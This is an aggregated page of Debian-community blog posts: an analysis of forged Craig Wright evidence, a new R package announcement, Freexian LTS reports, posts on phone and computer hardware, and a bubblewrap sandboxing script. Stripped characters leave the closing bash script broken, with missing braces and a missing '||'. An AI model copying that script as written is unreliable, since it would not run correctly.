But there's a very weird difference between the copy of the email that was submitted in evidence and the copy that was located afterwards! The first included a header inserted by gmail that included a 2019 timestamp, while the latter had a 2024 timestamp. Is there a way to determine which of these could be the truth? It turns out there is! The format of that header changed in 2022, and the version in the email is the new version. The version with the 2019 timestamp is anachronistic - the format simply doesn't match the header that gmail would have introduced in 2019, suggesting that an email sent in 2022 or later was modified to include a timestamp of 2019.

This is by no means the only indication that Craig Wright's evidence may be misleading (there's the whole argument that the Bitcoin white paper was written in LaTeX when general consensus is that it's written in OpenOffice, given that's what the metadata claims), but it's a lovely example of a more general issue.

Our technology chains are complicated. So many moving parts end up influencing the content of the data we generate, and those parts develop over time. It's fantastically difficult to generate an artifact now that precisely corresponds to how it would look in the past, even if we go to the effort of installing an old OS on an old PC and setting the clock appropriately (are you sure you're going to be able to mimic an entirely period appropriate patch level?). Even the version of the font you use in a document may indicate it's anachronistic. I'm pretty good at computers and I no longer have any belief I could fake an old document.

(References: this Dropbox, under "Expert reports", "Patrick Madden". Initial MYOB data is in "Appendix PM7", further analysis is in "Appendix PM42", email analysis is "Sixth Expert Report of Mr Patrick Madden")

comments

Dirk Eddelbuettel: ciw 0.0.1 on CRAN: New Package!

Happy to share that ciw is now on CRAN! I had tooted a little bit about it, e.g., here. What it provides is a single (efficient) function incoming() which summarises the state of the incoming directories at CRAN. I happen to like having these things at my (shell) fingertips, so it goes along with (still draft) wrapper ciw.r that will be part of the next littler release. For example, when I do this right now as I type this, I see

edd@rob:~$ ciw.r
    Folder                   Name                Time   Size          Age
    <char>                 <char>              <POSc> <char>   <difftime>
1: waiting   maximin_1.0-5.tar.gz 2024-03-13 22:22:00    20K   2.48 hours
2: inspect    GofCens_0.97.tar.gz 2024-03-13 21:12:00    29K   3.65 hours
3: inspect verbalisr_0.5.2.tar.gz 2024-03-13 20:09:00    79K   4.70 hours
4: waiting    rnames_1.0.1.tar.gz 2024-03-12 15:04:00   2.7K  33.78 hours
5: waiting  PCMBase_1.2.14.tar.gz 2024-03-10 12:32:00   406K  84.32 hours
6: pending        MPCR_1.1.tar.gz 2024-02-22 11:07:00   903K 493.73 hours
edd@rob:~$

which is rather compact as CRAN kept busy! This call runs in about (or just over) one second, which includes launching r. Good enough for me. From a well-connected EC2 instance it is about 800ms on the command-line. When I do I from here inside an R session it is maybe 700ms. And doing it over in Europe is faster still. (I am using ping=FALSE for these to omit the default sanity check of can I haz networking? to speed things up. The check adds another 200ms or so.) The function (and the wrapper) offer a ton of options too this is ridiculously easy to do thanks to the docopt package:

edd@rob:~$ ciw.r -x
Usage: ciw.r [-h] [-x] [-a] [-m] [-i] [-t] [-p] [-w] [-r] [-s] [-n] [-u] [-l rows] [-z] [ARG...]

-m --mega           use 'mega' mode of all folders (see --usage)
-i --inspect        visit 'inspect' folder
-t --pretest        visit 'pretest' folder
-p --pending        visit 'pending' folder
-w --waiting        visit 'waiting' folder
-r --recheck        visit 'waiting' folder
-a --archive        visit 'archive' folder
-n --newbies        visit 'newbies' folder
-u --publish        visit 'publish' folder
-s --skipsort       skip sorting of aggregate results by age
-l --lines rows     print top 'rows' of the result object [default: 50]
-z --ping           run the connectivity check first
-h --help           show this help text
-x --usage          show help and short example usage 

where ARG... can be one or more file name, or directories or package names.

Examples:
  ciw.r -ip                            # run in 'inspect' and 'pending' mode
  ciw.r -a                             # run with mode 'auto' resolved in incoming()
  ciw.r                                # run with defaults, same as '-itpwr'

When no argument is given, 'auto' is selected which corresponds to 'inspect', 'waiting',
'pending', 'pretest', and 'recheck'. Selecting '-m' or '--mega' are select as default.

Folder selecting arguments are cumulative; but 'mega' is a single selections of all folders
(i.e. 'inspect', 'waiting', 'pending', 'pretest', 'recheck', 'archive', 'newbies', 'publish').

ciw.r is part of littler which brings 'r' to the command-line.
See https://dirk.eddelbuettel.com/code/littler.html for more information.
edd@rob:~$

The README at the git repo and the CRAN page offer a screenshot movie showing some of the options in action. I have been using the little tools quite a bit over the last two or three weeks since I first put it together and find it quite handy. With that again a big Thank You! of appcreciation for all that CRAN does which this week included letting this past the newbies desk in under 24 hours. If you like this or other open-source work I do, you can sponsor me at GitHub.

This post by Dirk Eddelbuettel originated on his Thinking inside the box blog. Please report excessive re-aggregation in third-party for-profit settings.

Freexian Collaborators: Monthly report about Debian Long Term Support, February 2024 (by Roberto C. S nchez)

Like each month, have a look at the work funded by Freexian s Debian LTS offering.

Debian LTS contributors In February, 18 contributors have been paid to work on Debian LTS, their reports are available:

Abhijith PA did 10.0h (out of 14.0h assigned), thus carrying over 4.0h to the next month.

Adrian Bunk did 13.5h (out of 24.25h assigned and 41.75h from previous period), thus carrying over 52.5h to the next month.

Bastien Roucari s did 20.0h (out of 20.0h assigned).

Ben Hutchings did 2.0h (out of 14.5h assigned and 9.5h from previous period), thus carrying over 22.0h to the next month.

Chris Lamb did 18.0h (out of 18.0h assigned).

Daniel Leidert did 10.0h (out of 10.0h assigned).

Emilio Pozuelo Monfort did 3.0h (out of 28.25h assigned and 31.75h from previous period), thus carrying over 57.0h to the next month.

Guilhem Moulin did 7.25h (out of 4.75h assigned and 15.25h from previous period), thus carrying over 12.75h to the next month.

Holger Levsen did 0.5h (out of 3.5h assigned and 8.5h from previous period), thus carrying over 11.5h to the next month.

Lee Garrett did 0.0h (out of 18.25h assigned and 41.75h from previous period), thus carrying over 60.0h to the next month.

Markus Koschany did 40.0h (out of 40.0h assigned).

Roberto C. S nchez did 3.5h (out of 8.75h assigned and 3.25h from previous period), thus carrying over 8.5h to the next month.

Santiago Ruano Rinc n did 13.5h (out of 13.5h assigned and 2.5h from previous period), thus carrying over 2.5h to the next month.

Sean Whitton did 4.5h (out of 0.5h assigned and 5.5h from previous period), thus carrying over 1.5h to the next month.

Sylvain Beucler did 24.5h (out of 27.75h assigned and 32.25h from previous period), thus carrying over 35.5h to the next month.

Thorsten Alteholz did 14.0h (out of 14.0h assigned).

Tobias Frost did 12.0h (out of 12.0h assigned).

Utkarsh Gupta did 11.25h (out of 26.75h assigned and 33.25h from previous period), thus carrying over 48.75 to the next month.

Evolution of the situation In February, we have released 17 DLAs. The number of DLAs published during February was a bit lower than usual, as there was much work going on in the area of triaging CVEs (a number of which turned out to not affect Debia buster, and others which ended up being duplicates, or otherwise determined to be invalid). Of the packages which did receive updates, notable were sudo (to fix a privilege management issue), and iwd and wpa (both of which suffered from authentication bypass vulnerabilities). While this has already been already announced in the Freexian blog, we would like to mention here the start of the Long Term Support project for Samba 4.17. You can find all the important details in that post, but we would like to highlight that it is thanks to our LTS sponsors that we are able to fund the work from our partner, Catalyst, towards improving the security support of Samba in Debian 12 (Bookworm).

Thanks to our sponsors Sponsors that joined recently are in bold.

Platinum sponsors:

TOSHIBA (for 102 months)

Civil Infrastructure Platform (CIP) (for 70 months)

Gold sponsors:

Roche Diagnostics International AG (for 113 months)

Linode (for 107 months)

Babiel GmbH (for 96 months)

Plat Home (for 96 months)

CINECA (for 70 months)

University of Oxford (for 52 months)

Deveryware (for 39 months)

VyOS Inc (for 34 months)

EDF SA (for 23 months)

Silver sponsors:

Domeneshop AS (for 117 months)

Nantes M tropole (for 112 months)

Univention GmbH (for 103 months)

Universit Jean Monnet de St Etienne (for 103 months)

Ribbon Communications, Inc. (for 97 months)

Exonet B.V. (for 87 months)

Leibniz Rechenzentrum (for 81 months)

Minist re de l Europe et des Affaires trang res (for 64 months)

Cloudways by DigitalOcean (for 54 months)

Dinahosting SL (for 52 months)

Bauer Xcel Media Deutschland KG (for 46 months)

Platform.sh SAS (for 46 months)

Moxa Inc. (for 40 months)

sipgate GmbH (for 37 months)

OVH US LLC (for 35 months)

Tilburg University (for 35 months)

GSI Helmholtzzentrum f r Schwerionenforschung GmbH (for 27 months)

Soliton Systems K.K. (for 24 months)

Bronze sponsors:

Evolix (for 118 months)

Seznam.cz, a.s. (for 118 months)

Intevation GmbH (for 115 months)

Linuxhotel GmbH (for 115 months)

Daevel SARL (for 113 months)

Bitfolk LTD (for 112 months)

Megaspace Internet Services GmbH (for 112 months)

NUMLOG (for 112 months)

Greenbone AG (for 111 months)

WinGo AG (for 111 months)

Ecole Centrale de Nantes - LHEEA (for 107 months)

Entr ouvert (for 102 months)

Adfinis AG (for 99 months)

GNI MEDIA (for 94 months)

Laboratoire LEGI - UMR 5519 / CNRS (for 94 months)

Tesorion (for 94 months)

Bearstech (for 85 months)

LiHAS (for 85 months)

Catalyst IT Ltd (for 80 months)

Supagro (for 75 months)

Demarcq SAS (for 74 months)

Universit Grenoble Alpes (for 60 months)

TouchWeb SAS (for 52 months)

SPiN AG (for 49 months)

CoreFiling (for 44 months)

Institut des sciences cognitives Marc Jeannerod (for 39 months)

Observatoire des Sciences de l Univers de Grenoble (for 36 months)

Tem Innovations GmbH (for 31 months)

WordFinder.pro (for 30 months)

CNRS DT INSU R sif (for 29 months)

Alter Way (for 22 months)

Institut Camille Jordan (for 11 months)

13 March 2024

Russell Coker: The Shape of Computers

Introduction There have been many experiments with the sizes of computers, some of which have stayed around and some have gone away. The trend has been to make computers smaller, the early computers had buildings for them. Recently for come classes computers have started becoming as small as could be reasonably desired. For example phones are thin enough that they can blow away in a strong breeze, smart watches are much the same size as the old fashioned watches they replace, and NUC type computers are as small as they need to be given the size of monitors etc that they connect to. This means that further development in the size and shape of computers will largely be determined by human factors. I think we need to consider how computers might be developed to better suit humans and how to write free software to make such computers usable without being constrained by corporate interests. Those of us who are involved in developing OSs and applications need to consider how to adjust to the changes and ideally anticipate changes. While we can t anticipate the details of future devices we can easily predict general trends such as being smaller, higher resolution, etc. Desktop/Laptop PCs When home computers first came out it was standard to have the keyboard in the main box, the Apple ][ being the most well known example. This has lost popularity due to the demand to have multiple options for a light keyboard that can be moved for convenience combined with multiple options for the box part. But it still pops up occasionally such as the Raspberry Pi 400 [1] which succeeds due to having the computer part being small and light. I think this type of computer will remain a niche product. It could be used in a add a screen to make a laptop as opposed to the add a keyboard to a tablet to make a laptop model but a tablet without a keyboard is more useful than a non-server PC without a display. The PC as box with connections for keyboard, display, etc has a long future ahead of it. But the sizes will probably decrease (they should have stopped making PC cases to fit CD/DVD drives at least 10 years ago). The NUC size is a useful option and I think that DVD drives will stop being used for software soon which will allow a range of smaller form factors. The regular laptop is something that will remain useful, but the tablet with detachable keyboard devices could take a lot of that market. Full functionality for all tasks requires a keyboard because at the moment text editing with a touch screen is an unsolved problem in computer science [2]. The Lenovo Thinkpad X1 Fold [3] and related Lenovo products are very interesting. Advances in materials allow laptops to be thinner and lighter which leaves the screen size as a major limitation to portability. There is a conflict between desiring a large screen to see lots of content and wanting a small size to carry and making a device foldable is an obvious solution that has recently become possible. Making a foldable laptop drives a desire for not having a permanently attached keyboard which then makes a touch screen keyboard a requirement. So this means that user interfaces for PCs have to be adapted to work well on touch screens. The Think line seems to be continuing the history of innovation that it had when owned by IBM. There are also a range of other laptops that have two regular screens so they are essentially the same as the Thinkpad X1 Fold but with two separate screens instead of one folding one, prices are as low as $600US. I think that the typical interfaces for desktop PCs (EG MS-Windows and KDE) don t work well for small devices and touch devices and the Android interface generally isn t a good match for desktop systems. We need to invent more options for this. This is not a criticism of KDE, I use it every day and it works well. But it s designed for use cases that don t match new hardware that is on sale. As an aside it would be nice if Lenovo gave samples of their newest gear to people who make significant contributions to GUIs. Give a few Thinkpad Fold devices to KDE people, a few to GNOME people, and a few others to people involved in Wayland development and see how that promotes software development and future sales. We also need to adopt features from laptops and phones into desktop PCs. When voice recognition software was first released in the 90s it was for desktop PCs, it didn t take off largely because it wasn t very accurate (none of them recognised my voice). Now voice recognition in phones is very accurate and it s very common for desktop PCs to have a webcam or headset with a microphone so it s time for this to be re-visited. GPS support in laptops is obviously useful and can work via Wifi location, via a USB GPS device, or via wwan mobile phone hardware (even if not used for wwan networking). Another possibility is using the same software interfaces as used for GPS on laptops for a static definition of location for a desktop PC or server. The Interesting New Things Watch Like The wrist-watch [4] has been a standard format for easy access to data when on the go since it s military use at the end of the 19th century when the practical benefits beat the supposed femininity of the watch. So it seems most likely that they will continue to be in widespread use in computerised form for the forseeable future. For comparison smart phones have been in widespread use as pocket watches for about 10 years. The question is how will watch computers end up? Will we have Dick Tracy style watch phones that you speak into? Will it be the current smart watch functionality of using the watch to answer a call which goes to a bluetooth headset? Will smart watches end up taking over the functionality of the calculator watch [5] which was popular in the 80 s? With today s technology you could easily have a fully capable PC strapped to your forearm, would that be useful? Phone Like Folding phones (originally popularised as Star Trek Tricorders) seem likely to have a long future ahead of them. Engineering technology has only recently developed to the stage of allowing them to work the way people would hope them to work (a folding screen with no gaps). Phones and tablets with multiple folds are coming out now [6]. This will allow phones to take much of the market share that tablets used to have while tablets and laptops merge at the high end. I ve previously written about Convergence between phones and desktop computers [7], the increased capabilities of phones adds to the case for Convergence. Folding phones also provide new possibilities for the OS. The Oppo OnePlus Open and the Google Pixel Fold both have a UI based around using the two halves of the folding screen for separate data at some times. I think that the current user interfaces for desktop PCs don t properly take advantage of multiple monitors and the possibilities raised by folding phones only adds to the lack. My pet peeve with multiple monitor setups is when they don t make it obvious which monitor has keyboard focus so you send a CTRL-W or ALT-F4 to the wrong screen by mistake, it s a problem that also happens on a single screen but is worse with multiple screens. There are rumours of phones described as three fold (where three means the number of segments with two folds between them), it will be interesting to see how that goes. Will phones go the same way as PCs in terms of having a separation between the compute bit and the input device? It s quite possible to have a compute device in the phone form factor inside a secure pocket which talks via Bluetooth to another device with a display and speakers. Then you could change your phone between a phone-size display and a tablet sized display easily and when using your phone a thief would not be able to easily steal the compute bit (which has passwords etc). Could the watch part of the phone (strapped to your wrist and difficult to steal) be the active part and have a tablet size device as an external display? There are already announcements of smart watches with up to 1GB of RAM (same as the Samsung Galaxy S3), that s enough for a lot of phone functionality. The Rabbit R1 [8] and the Humane AI Pin [9] have some interesting possibilities for AI speech interfaces. Could that take over some of the current phone use? It seems that visually impaired people have been doing badly in the trend towards touch screen phones so an option of a voice interface phone would be a good option for them. As an aside I hope some people are working on AI stuff for FOSS devices. Laptop Like One interesting PC variant I just discovered is the Higole 2 Pro portable battery operated Windows PC with 5.5 touch screen [10]. It looks too thick to fit in the same pockets as current phones but is still very portable. The version with built in battery is $AU423 which is in the usual price range for low end laptops and tablets. I don t think this is the future of computing, but it is something that is usable today while we wait for foldable devices to take over. The recent release of the Apple Vision Pro [11] has driven interest in 3D and head mounted computers. I think this could be a useful peripheral for a laptop or phone but it won t be part of a primary computing environment. In 2011 I wrote about the possibility of using augmented reality technology for providing a desktop computing environment [12]. I wonder how a Vision Pro would work for that on a train or passenger jet. Another interesting thing that s on offer is a laptop with 7 touch screen beside the keyboard [13]. It seems that someone just looked at what parts are available cheaply in China (due to being parts of more popular devices) and what could fit together. I think a keyboard should be central to the monitor for serious typing, but there may be useful corner cases where typing isn t that common and a touch-screen display is of use. Developing a range of strange hardware and then seeing which ones get adopted is a good thing and an advantage of Ali Express and Temu. Useful Hardware for Developing These Things I recently bought a second hand Thinkpad X1 Yoga Gen3 for $359 which has stylus support [14], and it s generally a great little laptop in every other way. There s a common failure case of that model where touch support for fingers breaks but the stylus still works which allows it to be used for testing touch screen functionality while making it cheap. The PineTime is a nice smart watch from Pine64 which is designed to be open [15]. I am quite happy with it but haven t done much with it yet (apart from wearing it every day and getting alerts etc from Android). At $50 when delivered to Australia it s significantly more expensive than most smart watches with similar features but still a lot cheaper than the high end ones. Also the Raspberry Pi Watch [16] is interesting too. The PinePhonePro is an OK phone made to open standards but it s hardware isn t as good as Android phones released in the same year [17]. I ve got some useful stuff done on mine, but the battery life is a major issue and the screen resolution is low. The Librem 5 phone from Purism has a better hardware design for security with switches to disable functionality [18], but it s even slower than the PinePhonePro. These are good devices for test and development but not ones that many people would be excited to use every day. Wwan hardware (for accessing the phone network) in M.2 form factor can be obtained for free if you have access to old/broken laptops. Such devices start at about $35 if you want to buy one. USB GPS devices also start at about $35 so probably not worth getting if you can get a wwan device that does GPS as well. What We Must Do Debian appears to have some voice input software in the pocketsphinx package but no documentation on how it s to be used. This would be a good thing to document, I spent 15 mins looking at it and couldn t get it going. To take advantage of the hardware features in phones we need software support and we ideally don t want free software to lag too far behind proprietary software which IMHO means the typical Android setup for phones/tablets. Support for changing screen resolution is already there as is support for touch screens. Support for adapting the GUI to changed screen size is something that needs to be done even today s hardware of connecting a small laptop to an external monitor doesn t have the ideal functionality for changing the UI. There also seem to be some limitations in touch screen support with multiple screens, I haven t investigated this properly yet, it definitely doesn t work in an expected manner in Ubuntu 22.04 and I haven t yet tested the combinations on Debian/Unstable. ML is becoming a big thing and it has some interesting use cases for small devices where a smart device can compensate for limited input options. There s a lot of work that needs to be done in this area and we are limited by the fact that we can t just rip off the work of other people for use as training data in the way that corporations do. Security is more important for devices that are at high risk of theft. The vast majority of free software installations are way behind Android in terms of security and we need to address that. I have some ideas for improvement but there is always a conflict between security and usability and while Android is usable for it s own special apps it s not usable in a I want to run applications that use any files from any other applicationsin any way I want sense. My post about Sandboxing Phone apps is relevant for people who are interested in this [19]. We also need to extend security models to cope with things like ok google type functionality which has the potential to be a bug and the emerging class of LLM based attacks. I will write more posts about these thing. Please write comments mentioning FOSS hardware and software projects that address these issues and also documentation for such things.

Freexian Collaborators: Debian Contributions: Upcoming Improvements to Salsa CI, /usr-move, packaging simplemonitor, and more! (by Utkarsh Gupta)

Contributing to Debian is part of Freexian s mission. This article covers the latest achievements of Freexian and their collaborators. All of this is made possible by organizations subscribing to our Long Term Support contracts and consulting services.

/usr-move, by Helmut Grohne Much of the work was spent on handling interaction with time time64 transition and sending patches for mitigating fallout. The set of packages relevant to `debootstrap` is mostly converted and the patches for `glibc` and `base-files` have been refined due to feedback from the upload to Ubuntu noble. Beyond this, he sent patches for all remaining packages that cannot move their files with `dh-sequence-movetousr` and packages using `dpkg-divert` in ways that `dumat` would not recognize.

Upcoming improvements to Salsa CI, by Santiago Ruano Rinc n Last month, Santiago Ruano Rinc n started the work on integrating sbuild into the Salsa CI pipeline. Initially, Santiago used sbuild with the `unshare` chroot mode. However, after discussion with josch, jochensp and helmut (thanks to them!), it turns out that the unshare mode is not the most suitable for the pipeline, since the level of isolation it provides is not needed, and some test suites would fail (eg: krb5). Additionally, one of the requirements of the build job is the use of ccache, since it is needed by some C/C++ large projects to reduce the compilation time. In the preliminary work with unshare last month, it was not possible to make ccache to work. Finally, Santiago changed the chroot mode, and now has a couple of POC (cf: 1 and 2) that rely on the `schroot` and `sudo`, respectively. And the good news is that ccache is successfully used by sbuild with schroot! The image here comes from an example of building `grep`. At the end of the build, `ccache -s` shows the statistics of the cache that it used, and so a little more than half of the calls of that job were cacheable. The most important pieces are in place to finish the integration of sbuild into the pipeline. Other than that, Santiago also reviewed the very useful merge request !346, made by IOhannes zm lnig to autodetect the release from debian/changelog. As agreed with IOhannes, Santiago is preparing a merge request to include the release autodetection use case in the very own Salsa CI s CI.

Packaging simplemonitor, by Carles Pina i Estany Carles started using simplemonitor in 2017, opened a WNPP bug in 2022 and started packaging simplemonitor dependencies in October 2023. After packaging five direct and indirect dependencies, Carles finally uploaded simplemonitor to unstable in February. During the packaging of simplemonitor, Carles reported a few issues to upstream. Some of these were to make the simplemonitor package build and run tests reproducibly. A reproducibility issue was reprotest overriding the timezone, which broke simplemonitor s tests. There have been discussions on resolving this upstream in simplemonitor and in reprotest, too. Carles also started upgrading or improving some of simplemonitor s dependencies.

Miscellaneous contributions

Stefano Rivera spent some time doing admin on debian.social infrastructure. Including dealing with a spike of abuse on the Jitsi server.

Stefano started to prepare a new release of dh-python, including cleaning out a lot of old Python 2.x related code. Thanks to Niels Thykier (outside Freexian) for spear-heading this work.

DebConf 24 planning is beginning. Stefano discussed venues and finances with the local team and remotely supported a site-visit by Nattie (outside Freexian).

Also in the DebConf 24 context, Santiago took part in discussions and preparations related to the Content Team.

A JIT bug was reported against pypy3 in Debian Bookworm. Stefano bisected the upstream history to find the patch (it was already resolved upstream) and released an update to pypy3 in bookworm.

Enrico participated in /usr-merge discussions with Helmut.

Colin Watson backported a python-channels-redis fix to bookworm, rediscovered while working on debusine.

Colin dug into a cluster of celery build failures and tracked the hardest bit down to a Python 3.12 regression, now fixed in unstable. celery should be back in testing once the 64-bit time_t migration is out of the way.

Thorsten Alteholz uploaded a new upstream version of cpdb-libs. Unfortunately upstream changed the naming of their release tags, so updating the watch file was a bit demanding. Anyway this version 2.0 is a huge step towards introduction of the new Common Print Dialog Backends.

Helmut send patches for 48 cross build failures.

Helmut changed debvm to use mkfs.ext4 instead of genext2fs.

Helmut sent a debci MR for improving collector robustness.

In preparation for DebConf 25, Santiago worked on the Brest Bid.

12 March 2024

Russell Coker: Android vs FOSS Phones

To achieve my aims regarding Convergence of mobile phone and PC [1] I need something a big bigger than the 4G of RAM that s in the PinePhone Pro [2]. The PinePhonePro was released at the end of 2021 but has a SoC that was first released in 2016. That SoC seems to compare well to the ones used in the Pixel and Pixel 2 phones that were released in the same time period so it s not a bad SoC, but it doesn t compare well to more recent Android devices and it also isn t a great fit for the non-Android things I want to do. Also the PinePhonePro and Librem5 have relatively short battery life so reusing Android functionality for power saving could provide a real benefit. So I want a phone designed for the mass market that I can use for running Debian. PostmarketOS One thing I m definitely not going to do is attempt a full port of Linux to a different platform or support of kernel etc. So I need to choose a device that already has support from a somewhat free Linux system. The PostmarketOS system is the first I considered, the PostmarketOS Wiki page of supported devices [3] was the first place I looked. The main supported devices are the PinePhone (not Pro) and the Librem5, both of which are under-powered. For the community devices there seems to be nothing that supports calls, SMS, mobile data, and USB-OTG and which also has 4G of RAM or more. If I skip USB-OTG (which presumably means I d have to get dock functionality via wifi not impossible but not great) then I m left with the SHIFT6mq which was never sold in Australia and the Xiomi POCO F1 which doesn t appear to be available on ebay. LineageOS The libhybris libraries are a compatibility layer between Android and glibc programs [4]. Which includes running Wayland with Android display drivers. So running a somewhat standard Linux desktop on top of an Android kernel should be possible. Here is a table of the LineageOS supported devices that seem to have a useful feature set and are available in Australia and which could be used for running Debian with firmware and drivers copied from Android. I only checked LineageOS as it seems to be the main free Android build.

Phone	RAM	External Display	Price
Edge 20 Pro [5]	6-12G	HDMI	$500 not many on sale
Edge S aka moto G100 [6]	6-8G	HDMI	$500 to $600+
Fairphone 4	6-8G	USBC-DP	$1000+
Nubia Red Magic 5G	8-16G	USBC-DP	$600+

The LineageOS device search page [9] allows searching by kernel version. There are no phones with a 6.6 (2023) or 6.1 (2022) Linux kernel and only the Pixel 8/8Pro and the OnePlus 11 5G run 5.15 (2021). There are 8 Google devices (Pixel 6/7 and a tablet) running 5.10 (2020), 18 devices running 5.4 (2019), and 32 devices running 4.19 (2018). There are 186 devices running kernels older than 4.19 which aren t in the kernel.org supported release list [10]. The Pixel 8 Pro with 12G of RAM and the OnePlus 11 5G with 16G of RAM are appealing as portable desktop computers, until recently my main laptop had 8G of RAM. But they cost over $1000 second hand compared to $359 for my latest laptop. Fosdem had an interesting lecture from two Fairphone employees about what they are doing to make phone production fairer for workers and less harmful for the environment [11]. But they don t have the market power that companies like Google have to tell SoC vendors what they want. IP Laws and Practices Bunnie wrote an insightful and informative blog post about the difference between intellectual property practices in China and US influenced countries and his efforts to reverse engineer a commonly used Chinese SoC [12]. This is a major factor in the lack of support for FOSS on phones and other devices. Droidian and Buying a Note 9 The FOSDEM 2023 has a lecture about the Droidian project which runs Debian with firmware and drivers from Android to make a usable mostly-FOSS system [13]. It s interesting how they use containers for the necessary Android apps. Here is the list of devices supported by Droidian [14]. Two notable entries in the list of supported devices are the Volla Phone and Volla Phone 22 from Volla a company dedicated to making open Android based devices [15]. But they don t seem to be available on ebay and the new price of the Volla Phone 22 is E452 ($AU750) which is more than I want to pay for a device that isn t as open as the Pine64 and Purism products. The Volla Phone 22 only has 4G of RAM.

Phone	RAM	Price	Issues
Note 9 128G/512G	6G/8G	<$300	Not supporting external display
Galaxy S9+	6G	<$300	Not supporting external display
Xperia 5	6G	>$300	Hotspot partly working
OnePlus 3T	6G	$200 $400+	photos not working

I just bought a Note 9 with 128G of storage and 6G of RAM for $109 to try out Droidian, it has some screen burn but that s OK for a test system and if I end up using it seriously I ll just buy another that s in as-new condition. With no support for an external display I ll need to setup a software dock to do Convergence, but that s not a serious problem. If I end up making a Note 9 with Droidian my daily driver then I ll use the 512G/8G model for that and use the cheap one for testing. Mobian I should have checked the Mobian list first as it s the main Debian variant for phones. From the Mobian Devices list [16] the OnePlus 6T has 8G of RAM or more but isn t available in Australia and costs more than $400 when imported. The PocoPhone F1 doesn t seem to be available on ebay. The Shift6mq is made by a German company with similar aims to the Fairphone [17], it looks nice but costs E577 which is more than I want to spend and isn t on the officially supported list. Smart Watches The same issues apply to smart watches. AstereoidOS is a free smart phone OS designed for closed hardware [18]. I don t have time to get involved in this sort of thing though, I can t hack on every device I use.

11 March 2024

Joachim Breitner: Convenient sandboxed development environment

I like using one machine and setup for everything, from serious development work to hobby projects to managing my finances. This is very convenient, as often the lines between these are blurred. But it is also scary if I think of the large number of people who I have to trust to not want to extract all my personal data. Whenever I run a cabal install, or a fun VSCode extension gets updated, or anything like that, I am running code that could be malicious or buggy. In a way it is surprising and reassuring that, as far as I can tell, this commonly does not happen. Most open source developers out there seem to be nice and well-meaning, after all.

Convenient or it won t happen Nevertheless I thought I should do something about this. The safest option would probably to use dedicated virtual machines for the development work, with very little interaction with my main system. But knowing me, that did not seem likely to happen, as it sounded like a fair amount of hassle. So I aimed for a viable compromise between security and convenient, and one that does not get too much in the way of my current habits. For instance, it seems desirable to have the project files accessible from my unconstrained environment. This way, I could perform certain actions that need access to secret keys or tokens, but are (unlikely) to run code (e.g. `git push`, `git pull` from private repositories, `gh pr create`) from the outside , and the actual build environment can do without access to these secrets. The user experience I thus want is a quick way to enter a development environment where I can do most of the things I need to do while programming (network access, running command line and GUI programs), with access to the current project, but without access to my actual `/home` directory. I initially followed the blog post Application Isolation using NixOS Containers by Marcin Sucharski and got something working that mostly did what I wanted, but then a colleague pointed out that tools like `firejail` can achieve roughly the same with a less global setup. I tried to use `firejail`, but found it to be a bit too inflexible for my particular whims, so I ended up writing a small wrapper around the lower level sandboxing tool https://github.com/containers/bubblewrap.

Selective bubblewrapping This script, called `dev` and included below, builds a new filesystem namespace with minimal `/proc` and `/dev` directories, it s own `/tmp` directories. It then binds-mound some directories to make the host s NixOS system available inside the container (`/bin`, `/usr`, the nix store including domain socket, stuff for OpenGL applications). My user s home directory is taken from `~/.dev-home` and some configuration files are bind-mounted for convenient sharing. I intentionally don t share most of the configuration for example, a `direnv enable` in the dev environment should not affect the main environment. The X11 socket for graphical applications and the corresponding `.Xauthority` file is made available. And finally, if I run `dev` in a project directory, this project directory is bind mounted writable, and the current working directory is preserved. The effect is that I can type `dev` on the command line to enter dev mode rather conveniently. I can run development tools, including graphical ones like VSCode, and especially the latter with its extensions is part of the sandbox. To do a `git push` I either exit the development environment (Ctrl-D) or open a separate terminal. Overall, the inconvenience of switching back and forth seems worth the extra protection. Clearly, isn t going to hold against a determined and maybe targeted attacker (e.g. access to the X11 and the nix daemon socket can probably be used to escape easily). But I hope it will help against a compromised dev dependency that just deletes or exfiltrates data, like keys or passwords, from the usual places in `$HOME`.

Rough corners There is more polishing that could be done.

In particular, clicking on a link inside VSCode in the container will currently open Firefox inside the container, without access to my settings and cookies etc. Ideally, links would be opened in the Firefox running outside. This is a problem that has a solution in the world of applications that are sandboxed with Flatpak, and involves a bunch of moving parts (a xdg-desktop-portal user service, a filtering dbus proxy, exposing access to that proxy in the container). I experimented with that for a bit longer than I should have, but could not get it to work to satisfaction (even without a container involved, I could not get `xdg-desktop-portal` to heed my default browser settings ). For now I will live with manually copying and pasting URLs, we ll see how long this lasts.

With this setup (and unlike the NixOS container setup I tried first), the same applications are installed inside and outside. It might be useful to separate the set of installed programs: There is simply no point in running `evolution` or `firefox` inside the container, and if I do not even have VSCode or `cabal` available outside, so that it s less likely that I forget to enter `dev` before using these tools. It shouldn t be too hard to cargo-cult some of the NixOS Containers infrastructure to be able to have a separate system configuration that I can manage as part of my normal system configuration and make available to `bubblewrap` here.

So likely I will refine this some more over time. Or get tired of typing `dev` and going back to what I did before

The script

The dev script (at the time of writing)

#!/usr/bin/env bash

extra=()
if [[ "$PWD" == /home/jojo/build/* ]]   [[ "$PWD" == /home/jojo/projekte/programming/* ]]
then
extra+=(--bind "$PWD" "$PWD" --chdir "$PWD")
fi

if [ -n "$1" ]
then
    cmd=( "$@" )
else
    cmd=( bash )
fi

# Caveats:
# * access to all of  /etc 
# * access to  /nix/var/nix/daemon-socket/socket , and is trusted user (but needed to run nix)
# * access to X11

exec bwrap \
  --unshare-all \
\
 # blank slate  \
  --share-net \
  --proc /proc \
  --dev /dev \
  --tmpfs /tmp \
  --tmpfs /run/user/1000 \
\
 # Needed for GLX applications, in paticular alacritty  \
  --dev-bind /dev/dri /dev/dri \
  --ro-bind /sys/dev/char /sys/dev/char \
  --ro-bind /sys/devices/pci0000:00 /sys/devices/pci0000:00 \
  --ro-bind /run/opengl-driver /run/opengl-driver \
\
  --ro-bind /bin /bin \
  --ro-bind /usr /usr \
  --ro-bind /run/current-system /run/current-system \
  --ro-bind /nix /nix \
  --ro-bind /etc /etc \
  --ro-bind /run/systemd/resolve/stub-resolv.conf /run/systemd/resolve/stub-resolv.conf \
\
  --bind ~/.dev-home /home/jojo \
  --ro-bind ~/.config/alacritty ~/.config/alacritty  \
  --ro-bind ~/.config/nvim ~/.config/nvim  \
  --ro-bind ~/.local/share/nvim ~/.local/share/nvim  \
  --ro-bind ~/.bin ~/.bin \
\
  --bind /tmp/.X11-unix/X0 /tmp/.X11-unix/X0 \
  --bind ~/.Xauthority ~/.Xauthority \
  --setenv DISPLAY :0 \
\
  --setenv container dev \
  "$ extra[@] " \
  -- \
  "$ cmd[@] "

